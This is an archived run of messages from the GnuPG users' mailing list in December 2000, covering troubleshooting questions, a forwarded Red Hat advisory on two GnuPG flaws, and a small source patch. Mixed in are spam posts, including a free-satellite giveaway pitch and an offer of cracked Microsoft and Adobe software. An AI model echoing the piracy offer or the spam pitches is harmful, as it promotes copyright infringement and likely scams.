Outdoor Life Network, Sunshine, Madison Square Garden, Speed Vision, Home Team Sports, TV Games Fox Sports Channels - Arizona, Bay Area, Chicago, Cincinnati, Detroit, Midwest, Florida, New England, New York, Ohio, Pittsburgh, Rocky Mountain, North West, West, South, South West, Midwest Sports, Altenative1, Altenative3 News - CNN, CNN Headline News, All-News Network, Bloomberg, NASA, C-Span, C-Span 2, Fox News, MSNBC, CNN FN, CNN International, Court TV Family/Kids - The Cartoon Network, The Disney Channel, The Disney Toon Channel, Nickelodeon, Noggin, Pax, PBS You, Angel One, TV Land, Good Samaritan Network, The Fox Family Channel, Trinity Broadcast Network, External Word Television Network Learning - Discovery Channel, Discovery Health Channel, The Learning Channel, History Channel, Food Network, Travel, E!, Animal Planet, America's Voice, HGTV, Free Speech, Link Media, Tech TV, DELLL, Research Variety - A&E, BET, ZDTV, Home Shopping, WGN, QVC, TNN, Weather Channel, TNT, USA, Bravo, Comedy Central, Game Show, FX, Sci-Fi Channel, TV Land, AMC, TCM, LMN, Lifetime, Romance Classics/Independant Film Channel, BBC, ValueVision Foreign - Univision, Galavision, HITN Music - MTV, VH1, MTV 2, Country Music Television AND Over 30 Music Channels! Supplies are going FAST!!! So place your order NOW! A FREE 3 Day 2 Night Vacation for 2 for the first 1,000 NEW subscribers! Choose from 20 destinations: Las Vegas, NV -- Laughlin, NV -- Reno, NV -- Lake Tahoe, NV -- Atlantic City, NJ Honolulu, HI -- Daytona Beach, FL -- Orlando, FL -- Myrtle Beach, SC Anaheim, CA - (Disneyland Area) -- Palm Springs, CA -- New Orleans, LA Gatlinburg, TN -- San Antonio, TX -- White Mountain, NH -- Pocono Mountains, PA Branson, MO -- Puerto Vallarta, MX -- Cancun, MX -- Mazatlan, MX Don't hesitate or you may miss out on this incredible OFFER! -------------------------------------------------------------------------------- To receive your FREE Satellite System & FREE 3 Day 2 Night Vacation for 2! Call 1-877-397-6731 and Mention Code: 122 Live Operators are standing by to take your order 24/7! -------------------------------------------------------------------------------- To UNSUBSCRIBE, Click Here Subject: Don't miss this $700 Give Away!! Looking for that special gift for the person who has everything? -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From john@unixen.org Tue Dec 19 17:30:19 2000 From: john@unixen.org (John Bacalle) Date: Tue, 19 Dec 2000 12:30:19 -0500 Subject: Decrypt Output is Blank In-Reply-To: <20001219003709.A2489@unixen.org> References: <20001219003709.A2489@unixen.org> Message-ID: <20001219123019.B1959@unixen.org> On Tue, Dec 19, 2000 at 12:37:09AM -0500, John Bacalle wrote: -snip Can't decrypt or see output- No one can give me some feedback on this problem?? John -- John Bacalle -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From c.hertel@usa.net Tue Dec 19 17:53:39 2000 From: c.hertel@usa.net (Christoph Hertel) Date: Tue, 19 Dec 2000 18:53:39 +0100 Subject: Decrypt Output is Blank In-Reply-To: <20001219003709.A2489@unixen.org>; from john@unixen.org on Tue, Dec 19, 2000 at 12:37:09AM -0500 References: <20001219003709.A2489@unixen.org> Message-ID: <20001219185339.B394@imp.yoghurt.net> * John Bacalle [2000-12-19]: > RE: GnuPG v1.0.3 (MingW32) encrypted text to GnuPG v1.0.1 (GNU/Linux) the NEWS file: "Twofish and MDC enhanced encryption is now used. PGP 7 supports this. Older versions of GnuPG don't support it, so they should be upgraded to at least 1.0.2" this was mentioned a few times bewfore on the list -> search the archive; as far as I recall either you upgrade all GnuPGs or you don't use the Twofish algorithm (per gnupg options) HTH, Christoph -- PGP (GnuPG) encrypted mail welcome! (Key 0xBAC8E4D5) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 20 09:54:23 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 20 Dec 2000 10:54:23 +0100 Subject: AS/ 400 version? Message-ID: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> Hi there! Since I've been asked by a customer and didn't know an answer, I'll try to ask the community: Is there an AS/ 400 version of GnuPG or did anyone ever try to compile/ release a version for this platform? Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From tbeidler@mindspring.com Wed Dec 20 21:35:15 2000 From: tbeidler@mindspring.com (Tom Beidler) Date: Wed, 20 Dec 2000 13:35:15 -0800 Subject: "gpg - invalid armor header" warning Message-ID: I'm working with an ISP and trying to help him trouble shoot some issues. He's running GNUPG 1.04 and he's trying to import a PGP 6. something public key. He's telling me he's getting a "gpg - invalid armor header" error. I was able to add the key successfully to my PGP key ring. Can you import PGP keys? I didn't see anything in the FAQ or the "How to." Any help would be greatly appreciated. Thanks, Tom >>.>>.>>>.>>>>>.>>>>>>>>> Tom Beidler Orbit Tech Services 805.455.7119 (cell) 805.682.8972 (phone) 805.682.5833 (fax) tbeidler@mindspring.com >>.>>.>>>.>>>>>.>>>>>>>>> -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 20 22:57:59 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 20 Dec 2000 23:57:59 +0100 Subject: --with-colons, key type construction Message-ID: <000901c06ad8$4c6bb060$2bf8ae8b@bert> Hello! I took a deeper look into the output of the --with-colons command. For key type, My public key says, it is '17' and the sub key says it is '16'. Does 16 equal DSA Full (not only Encryption) and 17 El Gamal Encryption Only? If yes, what codes do El Gamal Full (En/ Decryption) RSA Full RSA Encryption only have? Thanks in advance, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 20 23:05:10 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 20 Dec 2000 23:05:10 +0000 Subject: --with-colons, key type construction In-Reply-To: <000901c06ad8$4c6bb060$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 20, 2000 at 11:57:59PM +0100 References: <000901c06ad8$4c6bb060$2bf8ae8b@bert> Message-ID: <20001220230509.A10957@mcdonald.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 20, 2000 at 11:57:59PM +0100, Stephan Stapel wrote: > > I took a deeper look into the output of the --with-colons command. > For key type, My public key says, it is '17' and the sub key says it is > '16'. > > Does 16 equal DSA Full (not only Encryption) and 17 El Gamal Encryption > Only? > If yes, what codes do > El Gamal Full (En/ Decryption) > RSA Full > RSA Encryption only > have? DSA can only do signatures, you can't do encryption with it. Extract from RFC2440: 9.1. Public Key Algorithms ID Algorithm -- --------- 1 - RSA (Encrypt or Sign) 2 - RSA Encrypt-Only 3 - RSA Sign-Only 16 - Elgamal (Encrypt-Only), see [ELGAMAL] 17 - DSA (Digital Signature Standard) 18 - Reserved for Elliptic Curve 19 - Reserved for ECDSA 20 - Elgamal (Encrypt or Sign) 21 - Reserved for Diffie-Hellman (X9.42, as defined for IETF-S/MIME) 100 to 110 - Private/Experimental algorithm. Andrew - -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6QTsZ/LupyPLe7TYRAiYZAJ927uxJURwY5ge4FLSW/4Y3PK6OHACfR3C5 WcyuNp1hVlbIp6n+qqwOsBs= =KEKP -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Wed Dec 20 17:59:39 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Wed, 20 Dec 2000 17:59:39 -0000 Subject: problem in keyring setup Message-ID: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> hello all, I am having a difficult time trying to find info on this project. where are the maillist archives please? when trying to import and delete keys to the gpg keyring, I get this repeated message: "gpg: waiting for lock (hold by 27748 - probably dead) "... ? I am not able to clear my keyring and import a PGP public one onto it... ALSO: what is the the unique userID? the key number, the text comment, the email address? pub 1024D/22222222 2000-12-18 Biz keefer (site_trans) ack! _nick -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 20 23:17:02 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 20 Dec 2000 23:17:02 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001217162932.A639@mcdonald.org.uk>; from andrew@mcdonald.org.uk on Sun, Dec 17, 2000 at 04:29:32PM +0000 References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> <20001217162932.A639@mcdonald.org.uk> Message-ID: <20001220231702.A10980@mcdonald.org.uk> On Sun, Dec 17, 2000 at 04:29:32PM +0000, Andrew McDonald wrote: > AFAIK, with the Outlook plug-in you would need to separately > encrypt/sign any attachments first (I'll double check that tomorrow). An update on this. It appears that the plug-in does sign/encrypt attachments. However, attachments are signed/encrypted separately from the body of the e-mail. This separate signing has a clear semantic difference to the PGP/MIME situation where they are signed together as a whole. As an example, consider a situation where I send a contract attached to an e-mail. The body of the e-mail says 'This is a draft. We aren't happy with it yet, and won't sign it until we've made some further alterations.' PGP/MIME signs the combined body and attachment. The PGP plug-in to Outlook signs them separately. The recipient can take the contract and show it to others with my signature on it, without showing them my qualifying statement from the body of the e-mail. Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From heesun9@mail.com Wed Dec 20 18:30:33 2000 From: heesun9@mail.com (heesun9@mail.com) Date: Wed, 20 Dec 2000 18:30:33 Subject: OS Software? Message-ID: <200012210604.eBL64uJ19170@mail.hsp.de> Are you interested in Office 2000? I am selling perfectly working copies of Microsoft Office 2000 SR-1 Premium Edition for a flat price of $50 USD. The suite contains 4 discs and includes: Word Excel Outlook PowerPoint Access FrontPage Publisher Small Business Tools PhotoDraw Office Developer 2000 is available as well for $65 and is the Premium version with Developer Tools. As well, why not try out some of the greatest operating systems below? Microsoft Windows 98 SE $20 Microsoft Windows Millenium $20 Microsoft Windows 2000 Pro $20 Microsoft Windows 2000 Server $50 Microsoft Windows 2000 Advanced Server (25CAL) $65 If you would like to order, please email me. I accept checks, money orders, and PayPal(Allows use of credit cards with 3% surcharge.) The software are virus checked and copied correctly with the best software and hardware available. In other words, they work flawlessly. CDR's as you know cost very little and there is little reason for me to rip you off. The highest cost is the time and effort I spent in defeating the copy protection system properly. I will definitely send the software upon receipt of payment. Mand Some of our other titles that are available include: Adobe Acrobat 4.0 $20 Adobe AfterEffects 4.1 $29 Adobe Dimensions 3.0 $29 Adobe FrameMaker 5.5 $29 Adobe Illustrator 9 $29 Adobe Image Styler 1 $29 Adobe InDesign 1.5 $20 Adobe PageMaker 6.5 $29 Adobe Pagemill 3 $29 Adobe Photoshop 6 $35 Adobe Premiere 5.1 $29 Adobe Photodeluxe 3.0 $20 Adobe Pro Jpeg 3.0 $20 Adobe Streamline 4.0 $20 MS Exchange 2000 Server $35 MS Map Point 2000 $20 MS Money 2000 *Deluxe $25 MS Office 2000 Proffessional $35 (Word, Excel, Outlook, Access, Power Point & Front Page) MS Office 2000 Premium $50 (Everything Proffessional has plus Photodraw, Publisher, and Business tools) MS Office 2000 Prem. Developer $65 (Everything Premium has plus Powerful Tools for software developers) MS Project 2000 $30 MS SQL Server 7.0 $50 MS WIndows 95 $15 MS Windows 98 SE $20 MS Windows 2000 Pro $20 MS Windows 2000 Advanced Server $65 MS Windows Millenium (WinME) $20 MS Visio 2000 Server $50 MS Visual Basic 6 Professional $30 MS Visual Studio Enterprise 6.0 $55 (Visual Basic, Foxpro, C++, InterDev, J++) *Other titles available: Corel Draw 10 $30 Macromedia Flash 5 $30 Macromedia Fireworks 4 $30 Macromedia Dreamweaver 4 $30 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Thu Dec 21 09:15:17 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Thu, 21 Dec 2000 10:15:17 +0100 Subject: problem in keyring setup In-Reply-To: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> References: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> Message-ID: <00122110151701.30241@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 20. December 2000 18:59, Nicholas F. Polys wrote: > hello all, > > I am having a difficult time trying to find info on this project. > where are the maillist archives please? They can be found at http://lists.gnupg.org. > when trying to import and delete keys to the gpg keyring, > > I get this repeated message: > > "gpg: waiting for lock (hold by 27748 - probably dead) "... > > ? The answer can be found in the archives. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6QcolqUQWN/hplRsRApj/AJ4sBFXhL/N7g71gfJ1N70hDKPDcIwCdFTpq MWdbOnhQLWti1HpSrcW47SY= =y9KE -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Thu Dec 21 09:18:53 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Thu, 21 Dec 2000 10:18:53 +0100 Subject: "gpg - invalid armor header" warning In-Reply-To: References: Message-ID: <00122110185302.30241@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 20. December 2000 22:35, Tom Beidler wrote: > I'm working with an ISP and trying to help him trouble shoot some > issues. > > He's running GNUPG 1.04 and he's trying to import a PGP 6. something > public key. He's telling me he's getting a "gpg - invalid armor > header" error. I was able to add the key successfully to my PGP key > ring. Can you import PGP keys? I didn't see anything in the FAQ or > the "How to." Have a look at the mailing list archives (lists.gnupg.org). IIRC importing the key with PGP, reexporting it and importing it with GnuPG sometimes helps. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Qcr+qUQWN/hplRsRAoRTAKDD4UJ2CNp+zprun4txC/CJXBxlAwCgicGn iscp4fdcEriqVGgGrnZcPbE= =wgg4 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Thu Dec 21 16:10:52 2000 From: rich@cnylug.org (Rich) Date: Thu, 21 Dec 2000 11:10:52 -0500 Subject: Does IDEA violate the GPL? Message-ID: <3A422B8C35C.EE80RICH@mail.dreamscape.com> So did we ever decide for certain if the adding of the IDEA cipher violates the GPL? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Thu Dec 21 19:00:09 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 21 Dec 2000 20:00:09 +0100 Subject: Does IDEA violate the GPL? In-Reply-To: <3A422B8C35C.EE80RICH@mail.dreamscape.com> References: <3A422B8C35C.EE80RICH@mail.dreamscape.com> Message-ID: <873dfh8urq.fsf@deneb.enyo.de> Rich writes: > So did we ever decide for certain if the adding of the IDEA cipher > violates the GPL? You have to ask the FSF to get a definite answer, not Werner. The FSF is the copyright holder of GnuPG, so they will sue you, and not Werner. ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From BCrowder@origin.ea.com Thu Dec 21 20:50:22 2000 From: BCrowder@origin.ea.com (Crowder, Brian) Date: Thu, 21 Dec 2000 14:50:22 -0600 Subject: Does IDEA violate the GPL? Message-ID: <2292DBED5A978A498EABCCE95524499E2C47C8@osi-postal.origin.ea.com> Seems like the IDEA copyright/patent holders would sue you first. > -----Original Message----- > From: Florian Weimer [mailto:fw@deneb.enyo.de] > Sent: Thursday, December 21, 2000 1:00 PM > To: Rich > Cc: gnupg-users@gnupg.org > Subject: Re: Does IDEA violate the GPL? > > > Rich writes: > > > So did we ever decide for certain if the adding of the IDEA cipher > > violates the GPL? > > You have to ask the FSF to get a definite answer, not Werner. The > FSF is the copyright holder of GnuPG, so they will sue you, and not > Werner. ;-) > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From hj4hj6@yahoo.com Thu Dec 21 01:27:56 2000 From: hj4hj6@yahoo.com (hj4hj6@yahoo.com) Date: 21 Dec 00 1:27:56 PM Subject: Improve your stepfamily life Message-ID: <26BN6MpZlQ05vPlHFv> Does your stepfamily life resemble a soap opera more than it does the Brady Bunch? The Stepfamily Association of America invites you to participate in THE NATIONAL CONFERENCE FOR STEPFAMILIES, Feb. 23-24, 2001, at the New Orleans Marriott Hotel. This is an opportunity, designed by knowledgeable professionals, in stepfamilies themselves, to help you: * Make your remarriage a success * Create bonds with your stepchildren * Help your children adjust emotionally * Manage money matters unique to your family * Get more help from legal, financial, psychological advisors * Overcome stepfather and stepmother stereotypes * Elicit cooperation from your children's schools * Bring more harmony into family life Complete conference details at http://www.edupr.com REGISTER ONLINE! Attend, and also enjoy Mardi Gras week in New Orleans! Special discounts for couples, students, groups. HOTEL IS BOOKING UP FAST. ACT NOW BEFORE ROOM BLOCK AND AIRLINE SEATS FILL Special rates for conference attendees. Visit http://www.edupr.com for discounts. Childcare available through a bonded local service. Up to 17 professional development credits available if you are an educator, clinician, financial planner, social worker. Questions? Email stepfamilyconf@mail.com If you would like to be removed, please email us back with the word "Remove" in the subject line. We apologize for any inconvenience. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dbergst@phoenixdsl.com Fri Dec 22 01:29:58 2000 From: dbergst@phoenixdsl.com (David R. Bergstein) Date: Thu, 21 Dec 2000 20:29:58 -0500 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 Message-ID: <00122120295801.15261@bluesman.drb.net> Can anyone comment on this recent security advisory, and whether any of RedHat's patches have been submitted to the gnupg cvs? Sincerely, -- David R. Bergstein Systems Engineer and Blues Musician - http://members.phoenixdsl.com/~dbergst Heart of Blue - bookings on-line at http://www.heartofblue.com GnuPG Public Key 0x460A4F20 - For info see http://www.gnupg.org Key fingerprint = F65D A2E0 805C C6D0 78EC 61AC 34C0 BB74 460A 4F20 ________________________________________________________________________ Life is a yo-yo, and mankind ties knots in the string. ---------- Forwarded Message ---------- Subject: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 Date: Wed, 20 Dec 2000 07:53:55 -0700 From: "Kurt Seifried" To: "linsec" LSLID:2000122005 --------------------------------------------------------------------- Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated gnupg packages now available Advisory ID: RHSA-2000:131-02 Issue date: 2000-12-19 Updated on: 2000-12-19 Product: Red Hat Linux Keywords: gnupg secret-key web-of-trust detached-signature Cross references: --------------------------------------------------------------------- 1. Topic: Updated gnupg packages are now available for Red Hat Linux 6.x and 7. 2. Relevant releases/architectures: Red Hat Linux 6.2 - alpha, i386, sparc Red Hat Linux 7.0 - alpha, i386 3. Problem description: When importing keys from public key servers, GnuPG will import private keys (also known as secret keys) in addition to public keys. If this happens, the user's web of trust becomes corrupted. Additionally, when used to check detached signatures, if the data file being checked contained clearsigned data, GnuPG would not warn the user if the detached signature was incorrect. 4. Solution: For each RPM for your particular architecture, run: rpm -Fvh [filename] where filename is the name of the RPM. 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info): 21889 - Web of trust circumvention by secret key distribution 21498 - Detached signature verification vulnerability 6. RPMs required: Red Hat Linux 6.2: SRPMS: ftp://updates.redhat.com//6.2/SRPMS/gnupg-1.0.4-8.6.x.src.rpm alpha: ftp://updates.redhat.com//6.2/alpha/gnupg-1.0.4-8.6.x.alpha.rpm i386: ftp://updates.redhat.com//6.2/i386/gnupg-1.0.4-8.6.x.i386.rpm sparc: ftp://updates.redhat.com//6.2/sparc/gnupg-1.0.4-8.6.x.sparc.rpm Red Hat Linux 7.0: SRPMS: ftp://updates.redhat.com//7.0/SRPMS/gnupg-1.0.4-8.6.x.src.rpm ftp://updates.redhat.com//7.0/SRPMS/gnupg-1.0.4-9.src.rpm alpha: ftp://updates.redhat.com//7.0/alpha/gnupg-1.0.4-9.alpha.rpm i386: ftp://updates.redhat.com//7.0/i386/gnupg-1.0.4-9.i386.rpm 7. Verification: MD5 sum Package Name -------------------------------------------------------------------------- aae767039effc37d4a929428e0d19543 6.2/alpha/gnupg-1.0.4-8.6.x.alpha.rpm 887b2d7d888fb8ee84c81cee7832384e 6.2/i386/gnupg-1.0.4-8.6.x.i386.rpm d7a3124166bc5c35cd3ca2dec36c97e0 6.2/sparc/gnupg-1.0.4-8.6.x.sparc.rpm 1f476ae8f5453655a4a61174de187d15 7.0/alpha/gnupg-1.0.4-9.alpha.rpm 88ac7d34da177b6c469e0f2a0f6117e6 7.0/i386/gnupg-1.0.4-9.i386.rpm 5e454eb08ce03f26eccbf7007026cd56 6.2/SRPMS/gnupg-1.0.4-8.6.x.src.rpm 4e81b35255980b0884e2f1ae3cf026d5 7.0/SRPMS/gnupg-1.0.4-9.src.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg 8. References: ftp://ftp.gnupg.org/pub/gcrypt/gnupg/gnupg-1.0.4.security-patch1.diff http://lists.gnupg.org/gnupg-devel-200012/msg00026.html http://lists.gnupg.org/gnupg-devel-200012/msg00028.html Copyright(c) 2000 Red Hat, Inc. ------------------------------------------------------- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 22 07:53:21 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 22 Dec 2000 00:53:21 -0700 Subject: Win32 Installation Package for GPG/WinPT (improved) Message-ID: <5.0.2.1.0.20001220140520.029f4948@maia.netsonic.net> The first "actual" release of WinGPG, a Windows 9x, ME, NT, 2K installation package of GPG and Timo Schulz's great little WinPT program, is now available at ftp://eepatents.com/clients/wingpg.exe. The ZIP archive is available at ftp://eepatents.com/clients/wingpg.zip for those who just want to browse through the files. I've fixed numerous bugs since the beta release (though this is probably still a "beta" release and that was an "alpha"). It seems to work OK on a couple of PCs and seems to be very easy to use. Included in this release is my first public disclosure of a passphrase selection scheme I've invented and a user's guide ("ABC MANUAL") written in simple, clear language for the average computer user who doesn't know (or care) anything about cryptography. Timo and I plan to work together on the next release, and look forward to comments, suggestions, and the inevitable bug reports. (He's the real programmer - I'm just a frustrated PGP user and part-time crypto inventor who still remembers how to write batch files and who got tired of waiting for a Win32 installation package people could actually understand.) Have fun. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Slava Moiseev Fri Dec 22 12:19:07 2000 From: Slava Moiseev (Slava Moiseev) Date: Fri, 22 Dec 2000 12:19:07 +0000 Subject: Question!!! Message-ID: <4512.001222@intes.odessa.ua> Hello, I need to use gnupg under Win 98/NT and Linux(Red Hat). I sign and encrypt my data under Windows NT, but when I try to decrypt it under Linux I don't get my data. Gnupg gives Invalid Signature. What does that mean? Thanks. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 22 09:40:57 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 22 Dec 2000 10:40:57 +0100 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net> References: <00122120295801.15261@bluesman.drb.net> Message-ID: <87lmt8lro6.fsf@deneb.enyo.de> "David R. Bergstein" writes: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? I suppose they have been taken from the CVS. These things were quickly fixed by Werner Koch once they were mentioned on gnupg-devel, but there's no official version yet which includes them. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andreas@netbank.com.br Fri Dec 22 11:57:58 2000 From: andreas@netbank.com.br (Andreas Hasenack) Date: Fri, 22 Dec 2000 09:57:58 -0200 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <87lmt8lro6.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Fri, Dec 22, 2000 at 10:40:57AM +0100 References: <00122120295801.15261@bluesman.drb.net> <87lmt8lro6.fsf@deneb.enyo.de> Message-ID: <20001222095758.J13751@conectiva.com.br> Em Fri, Dec 22, 2000 at 10:40:57AM +0100, Florian Weimer escreveu: > "David R. Bergstein" writes: > > > Can anyone comment on this recent security advisory, and whether any of > > RedHat's patches have been submitted to the gnupg cvs? > > I suppose they have been taken from the CVS. These things were > quickly fixed by Werner Koch once they were mentioned on gnupg-devel, > but there's no official version yet which includes them. Any news on a 1.0.5 release? -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Fri Dec 22 12:05:53 2000 From: daniele@ripe.net (Daniele Arena) Date: Fri, 22 Dec 2000 13:05:53 +0100 (CET) Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <87lmt8lro6.fsf@deneb.enyo.de> Message-ID: On 22 Dec 2000, Florian Weimer wrote: > I suppose they have been taken from the CVS. These things were > quickly fixed by Werner Koch once they were mentioned on gnupg-devel, > but there's no official version yet which includes them. Speaking of which, are there any plans to release 1.0.5 (incorporating the security fix and other patches) anytime soon (or not soon:)? No pressure meant, just curiosity. Cheers, Daniele. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From nalin@redhat.com Fri Dec 22 16:40:39 2000 From: nalin@redhat.com (Nalin Dahyabhai) Date: Fri, 22 Dec 2000 11:40:39 -0500 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net>; from dbergst@phoenixdsl.com on Thu, Dec 21, 2000 at 08:29:58PM -0500 References: <00122120295801.15261@bluesman.drb.net> Message-ID: <20001222114039.B4884@redhat.com> On Thu, Dec 21, 2000 at 08:29:58PM -0500, David R. Bergstein wrote: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? There was nothing for us to submit for inclusion that hadn't already been committed earlier. Cheers, Nalin -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Fri Dec 22 17:06:08 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Fri, 22 Dec 2000 17:06:08 +0000 Subject: Test failure on NetBSD In-Reply-To: <20001218150453.A23106@nmrc.ie>; from lhecking@nmrc.ie on Mon, Dec 18, 2000 at 03:04:53PM +0000 References: <20001218150453.A23106@nmrc.ie> Message-ID: <20001222170608.A12051@nmrc.ie> > Whether the problem lies with dd or the assumption that it should > generate a zero size file if invoked as above, I cannot say. The test > works fine if I remove 0 from the loop, though. All I wrote applies equally to OpenBSD (2.8). I suspect that this is a BSD dd specific issue, never having observed this on Solaris, DU etc. Also, the following mini-patch eliminates a (harmless :) compiler warning. I'm not familiar at all with NLS, it may be better to ifdef this line and add the corresponding configure test. --- util/miscutil.c.orig Fri Dec 22 17:04:28 2000 +++ util/miscutil.c Wed Dec 20 02:10:39 2000 @@ -25,6 +25,7 @@ #include #include #ifdef HAVE_LANGINFO_H + #include #include #endif #include "types.h" -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Fri Dec 22 17:20:49 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Fri, 22 Dec 2000 11:20:49 -0600 Subject: AS/ 400 version? In-Reply-To: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 20, 2000 at 10:54:23AM +0100 References: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> Message-ID: <20001222112048.A20866@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 20, 2000 at 10:54:23AM +0100, Stephan Stapel wrote: > Since I've been asked by a customer and didn't know an answer, 